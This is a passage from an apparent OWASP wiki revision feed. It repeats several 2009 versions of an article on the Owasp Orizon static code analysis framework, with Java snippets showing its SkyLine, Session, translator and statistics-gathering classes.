 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
If you are interested in the Owasp Orizon framework, you can use the following links:&lt;br /&gt;
* main page @ Owasp: [[::Category:OWASP_Orizon_Project|OWASP Orizon Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforge.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can also drop a line to the Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61246</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61246"/>
				<updated>2009-05-22T13:07:10Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
A lot of open source projects exist in the wild performing static code review analysis. This is good: it means that testing source code for security issues is becoming a requirement. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable points:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* low cost&lt;br /&gt;
&lt;br /&gt;
On the other hand, these tools don't share their most valuable asset: security knowledge. Each tool has its own security library, containing a lot of checks, without sharing that knowledge. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project was born to provide a common underlying layer to all open source projects concerned with static analysis. &lt;br /&gt;
&lt;br /&gt;
Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tool performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to statically analyze source code using the Orizon framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
The following picture shows the Owasp Orizon version 1.0 architecture. As you can see, the framework is organized into engines that perform tasks over the source code, plus a set of tools deployed out of the box so the APIs can be used in real world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With so many elements, a developer may be intimidated by the framework; that's why a special entity called SkyLine was created. Before going further into SkyLine, it's important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture grows wider, regular developers may be daunted by having to understand many APIs in order to build their security tool, so we help them by providing &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using the SkyLine object, developers can request services from the Orizon framework and wait for their completion. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine entry point is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as a string parameter, the calling program receives true if the service was accomplished, or false otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The second feature introduced in this first major framework release is support for command line options. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line options to the Orizon framework through SkyLine, the framework is tuned according to the given values. &lt;br /&gt;
&lt;br /&gt;
The following example makes this clearer: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all, folks! Internally, when the SkyLine constructor creates a code review session, it uses the values it was able to parse from the command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention: &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
These are the keys the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys, with comments and their default values.&lt;br /&gt;
&lt;br /&gt;
The only side effect is that the calling program cannot use the -o flag for its own purposes.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
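The key=value convention above is easy to model. The following is a minimal standalone sketch of such an option parser; the class name OrizonOptionSketch is made up for illustration and is not part of the Orizon framework. &lt;br /&gt;

```java
import java.util.HashMap;

// A standalone sketch (an assumption, not Orizon's actual parser) of how
// the "-o orizon_key=value" / "--orizon orizon_key=value" convention
// described above can be read from a command line.
class OrizonOptionSketch {
    public static HashMap parse(String[] args) {
        HashMap opts = new HashMap();
        if (args.length == 0) return opts;
        // walk up to the second-to-last token: a flag always needs a pair after it
        for (int i = 0; i != args.length - 1; i++) {
            if (args[i].equals("-o") || args[i].equals("--orizon")) {
                String pair = args[i + 1];        // the "key=value" token
                int eq = pair.indexOf('=');
                if (eq != -1)
                    opts.put(pair.substring(0, eq), pair.substring(eq + 1));
            }
        }
        return opts;
    }
}
```

For example, with the arguments -o lang=java --orizon recurse=true, parse() returns a map where the key lang maps to java and recurse maps to true. &lt;br /&gt;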
&lt;br /&gt;
=== Give me something to remember: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance owns all the properties specified through SkyLine, giving access to them upon request. It also contains a SessionInfo array with information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but will use SkyLine as its interface. Of course, anyone is free to ignore this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method inside the SkyLine class, you can see how the session instance is asked to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Starts a static analysis over the files being reviewed&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if static analysis can be performed or &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt;&lt;br /&gt;
 '''  *         if one or more files fail being analyzed.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''public boolean staticReview() {&lt;br /&gt;
 '''   boolean ret = true;&lt;br /&gt;
 '''   if (!active)&lt;br /&gt;
 '''      return log.error(&amp;quot;can't perform a static analysis over an inactive session.&amp;quot;);&lt;br /&gt;
 '''   for (int i = 0; i &amp;lt; sessions.length; i++) {&lt;br /&gt;
 '''       if (! sessions[i].staticReview())&lt;br /&gt;
 '''          ret = false;&lt;br /&gt;
 '''   }&lt;br /&gt;
 '''   return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
where the sessions variable is declared as:&lt;br /&gt;
 '''private SessionInfo[] sessions;&lt;br /&gt;
&lt;br /&gt;
As you can see, the Session object delegates service execution to the SessionInfo objects, then collects the final results. &lt;br /&gt;
&lt;br /&gt;
In fact, the SessionInfo objects are the ones that talk to the Orizon internals and perform the real work. &lt;br /&gt;
&lt;br /&gt;
The following method is taken from the org.owasp.orizon.SessionInfo class. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
 '''  * Perform a static analysis over the given file&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * A full static analysis is a mix from:&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  *  * local analysis (control flow)&lt;br /&gt;
 '''  *  * global analysis (call graph)&lt;br /&gt;
 '''  *  * taint propagation&lt;br /&gt;
 '''  *  * statistics&lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * &lt;br /&gt;
 '''  * @return &amp;lt;i&amp;gt;true&amp;lt;/i&amp;gt; if the file being reviewed doesn't violate any&lt;br /&gt;
 '''  *         security check, &amp;lt;i&amp;gt;false&amp;lt;/i&amp;gt; otherwise.&lt;br /&gt;
 '''  */&lt;br /&gt;
 '''  public boolean staticReview() {&lt;br /&gt;
 '''     boolean ret = false;&lt;br /&gt;
 '''     s = new Source(getStatFileName());&lt;br /&gt;
 '''     ret = s.analyzeStats();&lt;br /&gt;
 '''     ...&lt;br /&gt;
 '''     return ret;&lt;br /&gt;
 '''  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== The Translation Factory ===&lt;br /&gt;
One of the Owasp Orizon goals is to be independent of the source language being analyzed. This means that Owasp Orizon will support: &lt;br /&gt;
* Java&lt;br /&gt;
* C, C++&lt;br /&gt;
* C#&lt;br /&gt;
* Perl&lt;br /&gt;
* ...&lt;br /&gt;
Such support is achieved using an intermediate file format that describes the source code and is used to apply the security checks. That format is XML. &lt;br /&gt;
&lt;br /&gt;
Before static analysis starts, the source code is translated into XML. Starting from version 1.0, each source file is translated into four XML files: &lt;br /&gt;
&lt;br /&gt;
* an XML file containing statistical information&lt;br /&gt;
* an XML file containing variables tracking information&lt;br /&gt;
* an XML file containing program control flow (local analysis)&lt;br /&gt;
* an XML file containing call graph (global analysis)&lt;br /&gt;
&lt;br /&gt;
At the time of writing (Owasp Orizon v1.0pre1, September 2008), only the Java programming language is supported; however, other programming languages will follow soon. &lt;br /&gt;
&lt;br /&gt;
The translation phase is requested by the org.owasp.orizon.SessionInfo.inspect() method. Depending on the source file language, the appropriate Translator is instantiated and its scan() method is called. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' /**&lt;br /&gt;
 '''   * Inspects the source code, building AST trees&lt;br /&gt;
 '''   * @return&lt;br /&gt;
 '''   */&lt;br /&gt;
 '''   public boolean inspect() {&lt;br /&gt;
 '''      boolean ret = false;&lt;br /&gt;
 '''      switch (language) {&lt;br /&gt;
 '''         case Cons.O_JAVA:&lt;br /&gt;
 '''             t = new JavaTranslator();&lt;br /&gt;
 '''             if (!t.scan(getInFileName())) &lt;br /&gt;
 '''                return log.error(&amp;quot;can't scan &amp;quot; + getInFileName() + &amp;quot;.&amp;quot;);&lt;br /&gt;
 '''             ret = true;&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''         default:&lt;br /&gt;
 '''             log.error(&amp;quot;can't inspect language: &amp;quot; + Cons.name(language));&lt;br /&gt;
 '''         break;&lt;br /&gt;
 '''      }&lt;br /&gt;
 '''      return ret;&lt;br /&gt;
 '''   }&lt;br /&gt;
&lt;br /&gt;
The scan() method is abstract, defined in the org.owasp.orizon.translator.DefaultTranslator class and declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean scan(String in);&lt;br /&gt;
&lt;br /&gt;
Every class extending DefaultTranslator must implement in this method how to scan the source file and build the ASTs. &lt;br /&gt;
&lt;br /&gt;
Aside from the scan() method, there are four abstract methods needed to create the XML input files. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ''' public abstract boolean statService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean callGraphService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean dataFlowService(String in, String out);&lt;br /&gt;
 ''' public abstract boolean controlFlowService(String in, String out);&lt;br /&gt;
&lt;br /&gt;
All these methods are called from the translate() method, which is implemented directly in the DefaultTranslator class. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean translate(String in, String out, int service) {&lt;br /&gt;
 '''    if (!isGoodService(service))&lt;br /&gt;
 '''       return false;&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       if (!scan(in))&lt;br /&gt;
 '''          return log.error(in + &amp;quot;: scan failed&amp;quot;);&lt;br /&gt;
 '''    switch (service) {&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_STAT:&lt;br /&gt;
 '''          return statService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CF:&lt;br /&gt;
 '''          return controlFlowService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_CG:&lt;br /&gt;
 '''          return callGraphService(in, out);&lt;br /&gt;
 '''      case Cons.OC_TRANSLATOR_DF:&lt;br /&gt;
 '''          return dataFlowService(in, out);&lt;br /&gt;
 '''      default:&lt;br /&gt;
 '''          return log.error(&amp;quot;unknown service code&amp;quot;);&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
So, when a language-specific translator's translate() method is invoked, it dispatches to the language-specific service methods. &lt;br /&gt;
&lt;br /&gt;
Every translator contains, as a private field, a language-specific scanner holding the ASTs used in input file generation. &lt;br /&gt;
&lt;br /&gt;
Consider the org.owasp.orizon.translator.java.JavaTranslator class, which is declared as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public class JavaTranslator extends DefaultTranslator {&lt;br /&gt;
 '''   static SourcePositions positions;&lt;br /&gt;
 '''   private JavaScanner j;&lt;br /&gt;
 '''   ...&lt;br /&gt;
&lt;br /&gt;
JavaScanner is a class from the org.owasp.orizon.translator.java package; it uses the Sun JDK 6 Compiler API to scan a Java file, creating in-memory ASTs. The trees are created in the scan() method, implemented for the Java source language as follows: &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean scan(String in) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 '''    String[] parms = { in };&lt;br /&gt;
 '''    Trees trees;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();&lt;br /&gt;
 '''    if (compiler == null) &lt;br /&gt;
 '''       return log.error(&amp;quot;I can't find a suitable JAVA compiler. Is a JDK installed?&amp;quot;);&lt;br /&gt;
 ''' 	&lt;br /&gt;
 '''    DiagnosticCollector&amp;lt;JavaFileObject&amp;gt; diagnostics = new DiagnosticCollector&amp;lt;JavaFileObject&amp;gt;();&lt;br /&gt;
 '''    StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnostics, null, null);&lt;br /&gt;
 '''    Iterable&amp;lt;? extends JavaFileObject&amp;gt; fileObjects = fileManager.getJavaFileObjects(parms);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    JavacTask task = (com.sun.source.util.JavacTask) compiler.getTask(null,fileManager, diagnostics, null, null, fileObjects);&lt;br /&gt;
 '''&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        trees = Trees.instance(task);&lt;br /&gt;
 '''        positions = trees.getSourcePositions();&lt;br /&gt;
 '''        Iterable&amp;lt;? extends CompilationUnitTree&amp;gt; asts = task.parse();&lt;br /&gt;
 '''        for (CompilationUnitTree ast : asts) {&lt;br /&gt;
 '''            j = new JavaScanner(positions, ast);&lt;br /&gt;
 '''            j.scan(ast, null);&lt;br /&gt;
 '''        }&lt;br /&gt;
 '''        scanned = true;&lt;br /&gt;
 '''        return true;&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        return log.fatal(&amp;quot;an exception occurred while translating &amp;quot; + in + &amp;quot;: &amp;quot; + e.getLocalizedMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
=== Statistical Gathering ===&lt;br /&gt;
To implement statistical information gathering, the DefaultTranslator abstract method statService() must be implemented. The following example shows the JavaTranslator implementation. Statistical information is stored in the JavaScanner object itself and retrieved by the getStats() method. &lt;br /&gt;
&lt;br /&gt;
 ''' public final boolean statService(String in, String out) {&lt;br /&gt;
 '''    boolean ret = false;&lt;br /&gt;
 ''' 		&lt;br /&gt;
 '''    if (!scanned)&lt;br /&gt;
 '''       return log.error(in + &amp;quot;: call scan() before asking translation...&amp;quot;);&lt;br /&gt;
 '''    log.debug(&amp;quot;. Entering statService(): collecting stats for: &amp;quot; + in);&lt;br /&gt;
 '''    try {&lt;br /&gt;
 '''        createXmlFile(out);&lt;br /&gt;
 '''        xmlInit();&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;source name=\&amp;quot;&amp;quot; + in+&amp;quot;\&amp;quot; &amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xml(j.getStats());&lt;br /&gt;
 '''        xml(&amp;quot;&amp;lt;/source&amp;gt;&amp;quot;);&lt;br /&gt;
 '''        xmlEnd();&lt;br /&gt;
 '''&lt;br /&gt;
 '''        ret = true;&lt;br /&gt;
 '''        log.debug(&amp;quot;stats written into: &amp;quot; + out);&lt;br /&gt;
 '''    } catch (FileNotFoundException e) {&lt;br /&gt;
 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    } catch (UnsupportedEncodingException e) {&lt;br /&gt;
 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    } catch (IOException e) {&lt;br /&gt;
 '''        log.error(&amp;quot;an exception occurred: &amp;quot; + e.getMessage());&lt;br /&gt;
 '''    }&lt;br /&gt;
 '''    log.debug(&amp;quot;. Leaving statService()&amp;quot;);&lt;br /&gt;
 '''    return ret;&lt;br /&gt;
 ''' }&lt;br /&gt;
&lt;br /&gt;
== Reference == &lt;br /&gt;
&lt;br /&gt;
If you are interested in the Owasp Orizon framework, you can use the following links:&lt;br /&gt;
* main page @ Owasp: [[::Category:OWASP_Orizon_Project]]&lt;br /&gt;
* main site @ SourceForge: [http://orizon.sourceforge.net http://orizon.sourceforge.net]&lt;br /&gt;
* blog: [http://orizon.sourceforge.net/blog http://orizon.sourceforge.net/blog]&lt;br /&gt;
* author page @ Owasp: [http://www.owasp.org/index.php/User:Thesp0nge http://www.owasp.org/index.php/User:Thesp0nge]&lt;br /&gt;
&lt;br /&gt;
You can also drop a line to the Orizon author: [mailto:thesp0nge@owasp.org thesp0nge@owasp.org]&lt;br /&gt;
&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61245</id>
		<title>The Owasp Orizon Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=The_Owasp_Orizon_Framework&amp;diff=61245"/>
				<updated>2009-05-22T13:06:59Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Reference */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
A lot of open source projects exist in the wild performing static code review analysis. This is good: it means that testing source code for security issues is becoming a requirement. &lt;br /&gt;
&lt;br /&gt;
Such tools bring a lot of valuable points:&lt;br /&gt;
* community support&lt;br /&gt;
* source code freely available to anyone&lt;br /&gt;
* low cost&lt;br /&gt;
&lt;br /&gt;
On the other hand, these tools don't share their most valuable asset: security knowledge. Each tool has its own security library, containing a lot of checks, without sharing that knowledge. &lt;br /&gt;
&lt;br /&gt;
In 2006, the Owasp Orizon project was born to provide a common underlying layer to all open source projects concerned with static analysis. &lt;br /&gt;
&lt;br /&gt;
Orizon project includes:&lt;br /&gt;
* a set of APIs that developers can use to build their own security tool performing static analysis.&lt;br /&gt;
* a security library with checks to apply to source code.&lt;br /&gt;
* a tool, Milk, which is able to statically analyze source code using the Orizon framework.&lt;br /&gt;
&lt;br /&gt;
== The Owasp Orizon Architecture ==&lt;br /&gt;
The following picture shows the Owasp Orizon version 1.0 architecture. As you can see, the framework is organized into engines that perform tasks over the source code, plus a set of tools deployed out of the box so the APIs can be used in real world static analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp_Orizon_Architecture_v1.0.png|400px|The Owasp Orizon v1.0 architecture]]&lt;br /&gt;
&lt;br /&gt;
With so many elements, a developer may be intimidated by the framework; that's why a special entity called SkyLine was created. Before going further into SkyLine, it's important to understand all the elements Orizon is made of. &lt;br /&gt;
&lt;br /&gt;
=== Your personal butler: the SkyLine class ===&lt;br /&gt;
Named '''core''' in the architectural picture, the SkyLine object is one of the most valuable services in Orizon version 1.0. &lt;br /&gt;
&lt;br /&gt;
The idea behind SkyLine is simple: as the Orizon architecture grows wider, regular developers may be daunted by having to understand many APIs in order to build their security tool, so we help them by providing &amp;quot;per service&amp;quot; support. &lt;br /&gt;
&lt;br /&gt;
Using the SkyLine object, developers can request services from the Orizon framework and wait for their completion. &lt;br /&gt;
&lt;br /&gt;
The main SkyLine entry point is: &lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service)'''&lt;br /&gt;
&lt;br /&gt;
Passing the requested service as a string parameter, the calling program receives true if the service was accomplished, or false otherwise. &lt;br /&gt;
&lt;br /&gt;
The service name is compared to the ones understood by the framework: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''private int goodService(String service) {&lt;br /&gt;
 '''  int ret = -1;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;init&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_FRAMEWORK;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;translate&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_INIT_TRANSLATE;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;static_analysis&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_STATIC_ANALYSIS;&lt;br /&gt;
 '''  if (service.equalsIgnoreCase(&amp;quot;score&amp;quot;))&lt;br /&gt;
 '''      ret = Cons.OC_SERVICE_SCORE;&lt;br /&gt;
 '''  return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
The second feature introduced in this first major framework release is support for command line options. &lt;br /&gt;
&lt;br /&gt;
If the calling program passes command line options to the Orizon framework through SkyLine, the framework is tuned according to the given values. &lt;br /&gt;
&lt;br /&gt;
The following example makes this clearer: &lt;br /&gt;
&lt;br /&gt;
 '''public static void main(String[] args) {&lt;br /&gt;
 '''   String fileName = &amp;quot;&amp;quot;;&lt;br /&gt;
 '''   OldRecipe r;&lt;br /&gt;
 '''   DefaultLibrary dl;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   SkyLine skyLine = new SkyLine(args);&lt;br /&gt;
&lt;br /&gt;
That's all, folks! Internally, when the SkyLine constructor creates a code review session, it uses the values it was able to parse from the command line. &lt;br /&gt;
&lt;br /&gt;
The command line format must follow this convention: &lt;br /&gt;
&lt;br /&gt;
 ''' -o orizon_key=value&lt;br /&gt;
or the long format&lt;br /&gt;
 ''' --orizon orizon_key=value&lt;br /&gt;
&lt;br /&gt;
These are the keys the framework cares about:&lt;br /&gt;
* &amp;quot;input-name&amp;quot;&lt;br /&gt;
* &amp;quot;input-kind&amp;quot;&lt;br /&gt;
* &amp;quot;working-dir&amp;quot;&lt;br /&gt;
* &amp;quot;lang&amp;quot;&lt;br /&gt;
* &amp;quot;recurse&amp;quot;&lt;br /&gt;
* &amp;quot;output-format&amp;quot;&lt;br /&gt;
* &amp;quot;scan-type&amp;quot;&lt;br /&gt;
&lt;br /&gt;
The org.owasp.orizon.Cons class contains a detailed section about these keys, with comments and their default values.&lt;br /&gt;
&lt;br /&gt;
The only side effect is that the calling program cannot use the -o flag for its own purposes.&lt;br /&gt;
 &lt;br /&gt;
SkyLine is contained in the org.owasp.orizon package.&lt;br /&gt;
&lt;br /&gt;
=== Give me something to remember: the Session class ===&lt;br /&gt;
Another big feature introduced in Owasp Orizon version 1.0 is the code review session concept. One of the missing features in earlier versions was the capability to track the state of the code review process. &lt;br /&gt;
&lt;br /&gt;
A Session class instance owns all the properties specified through SkyLine, giving access to them upon request. It also contains a SessionInfo array with information about each file being reviewed. &lt;br /&gt;
&lt;br /&gt;
Ideally, a user tool will never call Session directly, but will use SkyLine as its interface. Of course, anyone is free to ignore this suggestion. &lt;br /&gt;
&lt;br /&gt;
Looking at the launch() method inside the SkyLine class, you can see how the session instance is asked to execute services. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 '''public boolean launch(String service) {&lt;br /&gt;
 '''   int code, stats;&lt;br /&gt;
 '''   boolean ret = false;&lt;br /&gt;
 '''&lt;br /&gt;
 '''   if ( (code = goodService(service)) == -1)&lt;br /&gt;
 '''      return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''   switch (code) {&lt;br /&gt;
 '''       // init service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_FRAMEWORK:&lt;br /&gt;
 '''            ret = session.init();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // translation service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_INIT_TRANSLATE:&lt;br /&gt;
 '''            stats = session.collectStats();&lt;br /&gt;
 '''            if (stats &amp;gt; 0) {&lt;br /&gt;
 '''               log.warning(stats + &amp;quot; files failed in collecting statistics.&amp;quot;);&lt;br /&gt;
 '''               ret = false;&lt;br /&gt;
 '''            } else&lt;br /&gt;
 '''               ret = true;&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // static analysis service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_STATIC_ANALYSIS:&lt;br /&gt;
 '''            ret = session.staticReview();&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       // score service&lt;br /&gt;
 '''       case Cons.OC_SERVICE_SCORE:&lt;br /&gt;
 '''            break;&lt;br /&gt;
 '''       default:&lt;br /&gt;
 '''            return log.error(&amp;quot;unknown service: &amp;quot; + service);&lt;br /&gt;
 '''       }&lt;br /&gt;
 '''       return ret;&lt;br /&gt;
 '''}&lt;br /&gt;
&lt;br /&gt;
Internally, the Session instance will ask each SessionInfo object to execute services. Let us consider the Session class method that executes the static analysis service. &lt;br /&gt;
&lt;br /&gt;
 '''/**&lt;br /&gt;
